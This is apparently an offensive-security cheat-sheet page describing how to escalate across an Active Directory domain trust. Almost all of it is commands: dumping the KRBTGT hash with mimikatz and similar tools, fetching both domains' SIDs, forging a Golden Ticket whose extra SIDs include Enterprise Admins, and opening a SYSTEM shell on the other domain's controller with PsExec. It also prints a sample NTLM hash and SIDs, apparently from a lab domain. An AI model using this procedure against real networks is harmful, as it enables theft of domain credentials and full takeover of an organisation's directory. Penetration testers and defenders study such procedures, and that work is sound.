Example attack: trust

Get KRBTGT secret

lsadump::lsa /inject /name:krbtgt
hashdump
dcsync_ntlm krbtgt

Hash NTLM: 7c7865e6e30e54e8845aad091b0ff447

Get SID of current domain

Get-DomainSID -Domain OPS.COMPLY.COM
S-1-5-21-2032401531-514583578-4118054891

Get SID of target domain

Get-DomainSID -Domain COMPLY.COM
S-1-5-21-1135011135-3178090508-3151492220

Generate Golden Ticket

/domain = current domain /sid = current domain /sids = other domain (trust)

Dont forget to add -519 to /sids, this is the static SID for Enterprise Admins

kerberos::golden /user:h4x /domain:OPS.COMPLY.COM /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-519 /ptt

Can now access DC in other domain!

.\PsExec64.exe -s \\rdc02 cmd -accepteula

Last updated 1 year ago